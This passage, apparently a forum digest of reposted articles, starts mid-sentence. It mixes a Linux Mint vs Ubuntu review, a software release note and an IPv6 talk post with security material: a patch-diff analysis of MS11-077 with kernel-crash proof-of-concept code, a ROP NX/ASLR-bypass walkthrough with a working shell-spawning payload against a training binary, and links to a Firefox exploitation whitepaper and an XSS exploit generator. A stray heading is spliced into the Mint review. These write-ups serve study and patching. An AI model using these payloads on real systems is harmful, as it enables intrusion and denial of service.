with Mozilla Thunderbird for email. Both offer fallback environments for systems without 3-D hardware acceleration, and proprietary drivers for video and wLinux Mint and MGSE vs. Ubuntu and Unityireless cards. Linux Mint 12 even introduces a new music player indicator reminiscent of Unity's. Neither includes provision for applets on the panel or application launchers on the desktop, the way that their mutual ancestor GNOME 2 did, although both do support folder and document desktop launchers. On the other hand, most of the differences are minimal. The package managers differ only in their branding, with Linux Mint's being less blaring and obtrusive, as usually happens with a community-based distribution. Admittedly, Linux Mint's system requirements list 500 megabytes of RAM compared to Ubuntu's 384. I suspect, though, that Linux Mint is simply being more realistic about how much memory is needed to do normal productivity without being completely frustrated. [h=4]MGSE vs. Unity[/h] So far as applications are concerned, the greatest difference is that Linux Mint defaults to the little-known DuckDuckGo search engine, whose advertising revenue Linux Mint shares. This is the closest that Linux Mint comes to matching Unity's extensive branding, but the exception is worthwhile. DuckDuckGo offers more options, greater privacy, and noticeably different search results than Google's, and needs only image searching to be a complete replacement. However, the greatest differences between Ubuntu and Linux Mint are in the user experience. After all, Unity is a simplification of the desktop inspired by the interfaces of mobile devices, while Linux Mint is a fusion of GNOME 2 and 3. This fusion is accomplished by adding MGSE options to the Shell Extensions tab for GNOME Tweak, which an increasing number of users consider an essential addition to GNOME 3. MGSE includes extensions to restore many of the features of GNOME 2 while converting GNOME 3 innovations such as the overview mode to options rather than unavoidable necessities. When toggled on, each extension takes effect immediately, allowing you to evaluate them without delay. For many, the most important of MGSE's innovations will probably be the bottom panel, its menu and its notification tray. Together, these extensions are enough to allow users to work on a single screen, instead of constantly switching to the overview mode to open applications or switch virtual workspaces, as GNOME 3 requires. These innovations do not fully restore GNOME 2 functionality, since the panel is not customizable, but they might minimally satisfy those discontented with Unity or GNOME 3. The menu included with Linux Mint 12 is reminiscent of openSUSE's Slab or KDE's Lancelot. It is less obtrusive than both GNOME 2's classical menu and the screen overlay that replaces the menu in Unity. The notification tray is a similar combination of the traditional and the innovative, invisible until toggled by the icon on the far right of the bottom panel, and as long as the bottom panel itself. This arrangement eliminates the usual problem of some of the tray being invisible, making it an improvement over both GNOME and Unity. Yet what is just as important as the extensions themselves is the fact they partially restore the most important feature that Unity often removes or limits: the freedom to work the way you want. In Linux Mint, you can, for instance, work with the bottom panel menu, or go to the GNOME 3 overview to open applications. Similarly, you can work with three virtual workspaces that are part of the panel, enabling the GNOME 3 overview mode to allow the shell to manage virtual workspaces, or use both at once. Although this range of choice needs to be extended before it can match the flexibility of GNOME 2, it is far more than anything provided by Unity, which generally imposes a single way to work on all users, regardless of their preferences. [h=4]Going Down the Road[/h] For those who already use Linux, the trend of Linux Mint is promising. MGSE in particular suggests that Linux Mint is in tune with the existing user base, a group that seems to value the ability to work in their preferred style more than any other factor. At the same time, I suspect that many existing users may feel that Linux Mint does not go far enough in its tendencies. While many will find it an improvement over Ubuntu with Unity, the improvement may not be great enough to be worth the effort of switching distributions. I wonder, too, whether the same qualities that might endear Linux Mint to existing users -- or, at least, make it the lesser of several evils -- will appeal equally to the new users that Unity seems calculated to attract. So far as the Distrowatch figures have meaning, they may reflect only the curiosity of existing users. For now, the most that can be said is that Linux Mint seems to be heading for a destination of which many existing users approve. Unfortunately, in the current release, it has moved part ways down the road but still has a ways to travel. To me, the important question is whether it can arrive before community interest shifts. Also (the question nobody is asking in the focus on Ubuntu) will GNOME or other distributions seize on MGSE as a graceful way of recovering from the embarrassing reception of GNOME 3? Sursa: Is Linux Mint an Ubuntu-Killer? - Datamation

Database Browser Portable 4.0.0.2 (multi-protocol database client) Released Submitted by John T. Haller on December 2, 2011 - 1:22pm Database Browser Portable 4.0.0.2 has been released. Database Browser Portable is an easy to use tool allows you to connect to any database (Oracle, MS-SQL, MySQL, Firebird, etc) and browse or modify data, run sql scripts, export and print data. This release adds suuport for Unicode in MySQL, PostreSQL, SLite and Interbase connections and encrypts connection details. It's packaged in PortableApps.com Format so it can easily integrate with the PortableApps.com Platform. Database Browser Portable is freeware for both commercial and personal use. This application is packaged for portable use by the publisher, DB Software Laboratory. Update automatically or install from the app store in the PortableApps.com Platform. Features Works directly with Oracle, MS Sql Server, ODBC, MySql, PostgreSQL, SQLite, Ole DB, Interbase and Firebird Support for ODBC connection strings Unlimited number of connections One click switching from one connection to another One click table browsing Data browsing Data exports into CSV, Excel, Html files Execution history SQL Builder with wide range of supported databases Execution Log Incremental Table Search Download: http://portableapps.com/bouncer?t=http%3A%2F%2Fwww.dbsoftlab.com%2Fdmdocuments%2FDatabaseBrowserPortable_4.0.0.2_English.paf.exe Sursa: Database Browser Portable 4.0.0.2 (multi-protocol database client) Released | PortableApps.com - Portable software for USB, portable and cloud drives

MS11-077: From Patch to Proof-of-Concept Posted by Bharat Jogi on Dec 2, 2011 8:06:08 AM [h=3]Abstract:[/h]In the October 2011 Patch Tuesday, Microsoft released update MS11-077 to fix a null pointer de-reference vulnerability (CVE-2011-1985). In this paper, we will reverse engineer the patch for MS11-077 (CVE-2011-1985) to get a better understanding of the vulnerability fixed by this patch. [h=3]Sample:[/h]Unpatched File: win32k.sys (version: 5.1.2600.6119) Patched File: win32k.sys (version: 5.1.2600.6149) [h=3]Patch Analysis:[/h] Using binary diff, we can see the changes that were made to the vulnerable file win32k.sys. Figure 1 below shows the TurboDiff results. Figure 1: TurboDiff Results As you can see in Figure 1 above, while most of the functions are identical, there are a couple of functions that look ‘suspicious’ and some others that are ‘changed’. The large number of changes is not a surprise because Microsoft has fixed four different vulnerabilities with this patch. Taking a closer look at all the functions that were changed, you will see that the changes made to functions ‘NtUserfnINLBOXSTRING’, ‘NtUserfnSENTDDEMSG’ and ‘NtUserfnINCBOXSTRING’ are all the same. Figure 2, below shows the changes made. Figure 2: Binary Diff for function NtUserfnINLBOXSTRING(x,x,x,x,x). Looking at the binary difference, it is clear that the patch is checking that the arg_0 (first argument passed to the function) is 0xFFFFFFFF and if it is 0xFFFFFFFF, call _UserSetLastError() with 0x578 and return from the function. This gives us two pointers to exploit the vulnerability. The first is that the arg_0 has to be 0xFFFFFFFF. The second pointer is that the patched function bails out setting system error code to 0x578. This is the system error code for ERROR_INVALID_WINDOW_HANDLE, thus hinting us that the argument is of type HWND. [h=3]Quest:[/h]Everything until now is pretty simple and it looks easy to exploit this vulnerability. However, the really challenge here is finding a user mode function that will call the vulnerable function. It turns out this isn’t very straightforward, and we will need to understand the Windows GUI subsystem. [h=3]Win32 GDI Subsystem:[/h] Figure 3: Win32 interfaces and their relation to the kernel components The GDI (Graphics Device Interface) APIs are implemented in the GDI32.DLL and include all the low-level graphics services such as drawing lines, displaying BMPs etc. The GDI APIs make system calls into the WIN32k.sys to implement most APIs. The User APIs are implemented in USER32.DLL module and include all higher-level GUI-related services such as window management, menus, dialog boxes, user controls etc. USER heavily relies on GDI to do its work. One of the most important means of communication in Windows is Messages. Windows-based applications are event-driven and act upon messages sent to them. The way you program in Windows is by responding to events. These events are called Messages. Messages can signal many events, caused by the user, the operating system, or another program. Each window, owned by a thread, has a window procedure (function) for processing input messages and dispatching them to the operating system. If a thread accesses any of the user interface or GDI system calls (handled by win32k.sys), the kernel creates a THREADINFO structure which holds three message queues used to process input. These are the input queue, the post queue, and the send queue. The input queue is primarily used for mouse and keyboard messages, while the send and post queues are used for synchronous (send) and asynchronous (post) window messages respectively. Asynchronous messages are used in one-way communication between window threads and are typically used to notify a window to perform a specific task. Asynchronous messages are handled by the PostMessage APIs and are sent to the post queue of the receiving thread. The sender does not wait for the processing to complete in the receiving thread and thus returns immediately. Synchronous messages differ from asynchronous messages as the sender typically waits for a response to be provided or a timeout to occur before continuing execution. Thus, they require mechanisms to ensure that the threads are properly synchronized and in the expected state. Synchronous messages use the SendMessage APIs which in turn directs execution to the NtUserMessageCall system call in win32k.sys. This information is enough for us to take our analysis further. [h=3]Hitting the vulnerable function:[/h]As described above, the message mechanism plays an integral role in the user interface component of the Windows operating system. There are many different types of message codes and those less than 0x400 are reserved by operating system. Depending upon the type of message code, NtUserMessageCall() calls a particular function to handle the message. Let’s take a closer look at how NtUserMessageCall, calls the appropriate functions to handle different message types. Figure 4: Assembly code for NtUserMessageCall() As seen in the above figure, the function first checks if the Msg code is less than 0x400(EAX has the Msg code) to check if it’s a system message code. Each Message code denotes an index in the win32k!MessageTable byte array. This byte value is than logically AND to 0x3F, since the last 6bits of the byte obtained from win32k!MessageTable determines the function that will handle the Message code. _gapfnMessageCall is a function table that stores address of all the functions that can handle different messages. See Figures below to see how _gapfnMessageCall table looks. Figure 5: _gapfnMessageCall function table Thus if we can get the index of our vulnerable function in _gapfnMessageCall, we can easily compute how we can call the vulnerable function. The index of our vulnerable functions are 29(0x1D), 27(0x27) and 43(0x2B) for NtUserfnINLBOXSTRING(),NtUserfnINCBOXSTRING() and NtUserfnSENTDDEMSG() respectively. Following is the pseudo code to compute Msg codes for hitting the vulnerable function: for i in range[0x00 to 0x400] if MessageTable & 0x3F == 0x1D //NtUserfnINLBOXSTRING() Hit! if MessageTable & 0x3F == 0x1B //NtUserfnINCBOXSTRING() Hit! if MessageTable & 0x3F == 0x2B //NtUserfnSENTDDEMSG() Hit! [h=3]Proof of Concept:[/h] [FONT=Courier New]#include <windows.h> [/FONT] [FONT=Courier New]int main(){[/FONT] [FONT=Courier New] SendNotifyMessageA((HWND)0xFFFF,0x143,0,0); [/FONT] [FONT=Courier New]}[/FONT] [FONT=Courier New]OR[/FONT] [FONT=Courier New]#include <windows.h>[/FONT] [FONT=Courier New]int main(){[/FONT] [FONT=Courier New] SendMessageCallbackA((HWND)0xFFFF,0x143,0,0);[/FONT] [FONT=Courier New]}[/FONT] Other Possible Msg codes for hitting vulnerable functions are: [FONT=Courier New]0x143, 0x14A, 0x14C, 0x14D, 0x158, 0x180, 0x181, 0x18C, 0x18F, 0x1A2, 0x1AA, 0x1AB, 0x1AC, 0x1AD, 0x3E2, 0x3E3, 0x3E5, 0x3E6, 0x3E7, 0x3E8 [/FONT] [h=3]Conclusion:[/h]As we've seen above, it is pretty easy to trigger this vulnerability. We would recommend our customers to scan their environment for QID 90746 and apply this security update as soon as possible. [h=3]References:[/h]http://www.codeproject.com/KB/dialog/messagehandling.aspx http://c0decstuff.blogspot.com/2011/03/desynchronization-issues-in-windows.html Reversing: Secrets of Reverse Engineering - Wikipedia, the free encyclopedia http://doxygen.reactos.org/d3/d69/include_2reactos_2win32k_2ntuser_8h_a14fd6fae7992b1218ed08fbaec9396b8.html http://uninformed.org/index.cgi?v=10&a=2#MSFT:2 Sursa: https://community.qualys.com/blogs/securitylabs/2011/12/02/ms11-077-from-patch-to-proof-of-concept

Gera’s Insecure Programming Advance Buffer Overflow #1 (ROP NX/ASLR Bypass) Posted on November 27, 2011 by lixor_ After my last post, I decided to go straight into the Advance Buffer Overflow (ABO) section and practice more ROP. The first ABO exercise was a straight-forward buffer overflow. ABO #1 source code: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10[/TD] [TD=class: code]/* abo1.c * * specially crafted to feed your brain by gera */ /* Dumb example to let you get introduced... */ int main(int argv,char **argc) { char buf[256]; strcpy(buf,argc[1]); }[/TD] [/TR] [/TABLE] The environment, as usual, was Debian 2.6.32 with NX and ASLR enabled. The binary can be found here. [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]lixor@debian:~$ uname -a Linux debian 2.6.32-5-686-bigmem #1 SMP Thu Nov 3 05:12:00 UTC 2011 i686 GNU/Linux[/TD] [/TR] [/TABLE] The technique that will be used throughout this post is known as “GOT dereferencing.” For the interested reader, you can read about the technique here. The return address can be found at 268 bytes. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ ./abo1 $(ruby -e 'print "A"*256 +"BBBBCCCCDDDDEEEE"') Segmentation fault (core dumped) lixor@debian:~/InsecureProgramming/abo1$ gdb -q -nx -batch abo1 core warning: Can't read pathname for load map: Input/output error. Core was generated by `./abo1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x45454545 in ?? () lixor@debian:~/InsecureProgramming/abo1$[/TD] [/TR] [/TABLE] I needed the use of two functions for this technique: the targeted function and the pivot function. I used VNSECURITY ROPEME tool to search for gadgets. The binary was rather small so finding certain gadgets was difficult. I was able to find some useful gadgets. The entire gadget list can be found here. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code](1) 0x8048392L: pop ebx ; pop ebp ;; (2) 0x804838bL: xchg ebp eax ; add al 0x8 ; add [ebx+0x5d5b04c4] eax ;; (1) 0x8048392L: pop ebx ; pop ebp ;; (3) 0x804847eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;; (4) 0x80483bfL: call eax ; leave ;;[/TD] [/TR] [/TABLE] I needed to perform some dummy calculations for (2) and (3). Gadget (2) accesses a memory location. EBX must be a valid memory location minus 0x5d5b04c4 (to obtain the intended address). A valid location can be found at the relocation table. I chose 0x080495a8 (__gmon_start__) for the first EBX in (2) and 0x080495b0 (strcpy) for the second one in (3). [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ readelf -r abo1 ... 080495a8 00000107 R_386_JUMP_SLOT 00000000 __gmon_start__ ... 080495b0 00000307 R_386_JUMP_SLOT 00000000 strcpy[/TD] [/TR] [/TABLE] The calculations for (2) and (3) are simple as shown: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]#first dummy value for ebx lixor@debian:~/InsecureProgramming/abo1$ perl -e 'printf "%x\n", 0x080495a8-0x5d5b04c4 ' aaa990e4 #real value lixor@debian:~/InsecureProgramming/abo1$ perl -e 'printf "%x\n", 0x080495b0 + 0xb8a0008 ' 138e95b8[/TD] [/TR] [/TABLE] Next, I performed the calculations for the EAX register. EAX will have the offset between system() and strcpy() minus 8 for (2). [TABLE] [TR] [TD=class: gutter] [/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ objdump -T /lib/i686/cmov/libc.so.6 | egrep ' strcpy$|system$' 00072ea0 g DF .text 00000023 GLIBC_2.0 strcpy 00039180 g DF .text 0000007d GLIBC_PRIVATE __libc_system 00039180 w DF .text 0000007d GLIBC_2.0 system lixor@debian:~/InsecureProgramming/abo1$ perl -e 'printf "%x\n", 0x00039180-0x00072ea0 - 0x8' fffc62d8 [/TD] [/TR] [/TABLE] Here is a general summary of important values: 1st dummy ebx = 0xaaa990e4 eax = 0xfffc62d8 ebx = 0x138e95b8 The last step was to find a string for system(). A safe option (like in my last post) was to use the string “GNU” from .note.gnu.build-id at 0×08048154. [TABLE] [TR] [TD=class: gutter] [/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ readelf -x .note.gnu.build-id abo1 Hex dump of section '.note.gnu.build-id': 0x08048148 04000000 14000000 03000000 474e5500 ............GNU. 0x08048158 abf92e7c f0e973e4 86c3ba84 9d7a7142 ...|..s......zqB 0x08048168 7122ec44 q".D [/TD] [/TR] [/TABLE] With that, the exercise was completed: [TABLE] [TR] [TD=class: gutter] [/TD] [TD=class: code]lixor@debian:~/InsecureProgramming/abo1$ ln -s /bin/sh GNU lixor@debian:~/InsecureProgramming/abo1$ export PATH=.:$PATH lixor@debian:~/InsecureProgramming/abo1$ ./abo1 $(perl -e 'print "A"x268 ."\x92\x83\x04\x08\xe4\x90\xa9\xaa\xd8\x62\xfc\xff\x8b\x83\x04\x08\x92\x83\x04\x08\xb8\x95\x8e\x13AAAA\x7e\x84\x04\x08MOVEPOPPPOPP\xbf\x83\x04\x08\x54\x81\x04\x08"') $ whoami lixor $ [/TD] [/TR] [/TABLE] Sursa: http://isisblogs.poly.edu/2011/11/27/geras-insecure-programming-advance-buffer-overflow-1-rop-nxaslr-bypass/

Cross Context Scripting with Firefox Roberto Suggi Liverani Senior Security Consultant Security-Assessment.com 21 April 2010 Contents Abstract ............................................................................................................................ 3 1. Introduction .................................................................................................................. 4 1.1 XPCOM Component Model ........................................................................................ 4 1.2 XUL ............................................................................................................................ 4 1.3 Chrome ....................................................................................................................... 5 1.4 XBL - Custom tags........................................................................................................ 5 1.5 XUL Overlay ................................................................................................................ 5 1.6 Themes, Skins and Locales ........................................................................................... 5 2. XCS Cases .................................................................................................................. 6 2.1 Case I: XCS via Event Handlers – Drag and Drop ............................................................. 6 2.2 Case II: Attacking Custom DOM event handlers................................................................ 8 2.3 Case III: Cross Domain Content/Script Include ............................................................... 10 2.4 Case IV: Injection via XBL ........................................................................................... 12 2.5 Case V: Attacking Wrappers ........................................................................................ 14 2.6 Case VI: Attacking XPCOM Components....................................................................... 15 2.7 Case VII: Sandbox Chrome Leakage ............................................................................ 18 2.8 Case VIII: Bypassing nsIScriptableUnescapeHTML.parseFragment() ................................ 19 3. Conclusion ................................................................................................................. 21 4. References ................................................................................................................ 22 Download: http://security-assessment.com/files/documents/whitepapers/Cross_Context_Scripting_with_Firefox.pdf http://security-assessment.com/files/documents/whitepapers/Exploiting_Cross_Context_Scripting_vulnerabilities_in_Firefox.pdf

GenXE - Generate Xss Exploit 0.9.0 Tool: Online Version Download ZIP Version Forum SourceForge Project Homepage Admin LiuDieYu <liudieyuinchina@vip.sina.com> Related links http://crosszone.org http://umbrella.mx.tc Sursa: http://genxe.sourceforge.net/

[h=3]0×375 – 0×07 – Security Considerations for a brave new (IPv6) World[/h]28/11/2011 I finally had the chance to present something at the Thessaloniki Tech Talk Sessions also known as 0×375. The people over there have done a great job, and I truly mean that, bringing tech people together. Almost once a month 2 speakers can present a tech topic they like at an open auditorium inside the Aristotle University of Thessaloniki. On those events people from Thessaloniki, but also from nearby cities, gather and have a great time, not only during the presentations but afterwards as well. I won’t spoil the events that take place during the tech talks, because you should definitely go if you are curious, but I can tell you that it’s not uncommon for as many as 15 to 20 people to go for beers after the talks! So, the past Friday (25/11/2011), me and @apoikos traveled from Athens to Thessaloniki to present at 0×375. My presentation was about some security concepts on IPv6 networks, how old attacks of the IPv4 world transform to new ones on the IPv6 world and about some new ones that will appear on local networks sooner or later. I also had prepared some small live demos, but as always it’s very hard to succeed in a live demo if you don’t quite control the environment. At least some of the stuff I wanted to show were successful, and I’m happy with those. (Thanks to Nuclear for booting his OS X guinea pig) Some apologies…When giving a presentation on IPv6, in an event that has no other introductory IPv6 presentations, I always face the same problem, most people are not very well aware of how different this protocol is from IPv4. When I ask the audience how well do they know IPv6, most people are embarrassed to say they have never actually used it, so the audience stays very, VERY silent. This means that I have to put around 15-20 slides to make a “quick introduction to IPv6?, and this unfortunately takes usually over 30? of presentation time. Some techy/advanced people might be bored with this, but there’s no other way to overcome this “issue”. If you go straight to the point and start discussing about ND ICMPv6 messages most people won’t be able to keep up…so I’m sorry if I made some of the audience get bored by my first slides. I promise that my next talk on 0×375, cause there will surely be a next one, will be less boring for you Thank you all for coming there, I hope you enjoyed it as much as I did! You can find the slides and my live demo notes here: Download: 0×375 – 0×07 – kargig – Security Considerations for a brave new (IPv6) World (pdf) 0×375 – 0×07 – kargig – Security Considerations for a brave new (IPv6) World – live demo notes (txt) P.S. I’ve started collecting some interesting (for me) presentations regarding IPv6 topics at void.gr/kargig/ipv6/. Check them out if you like. Sursa: http://www.void.gr/kargig/blog/2011/11/28/0x375-0x07-security-considerations-for-a-brave-new-ipv6-world/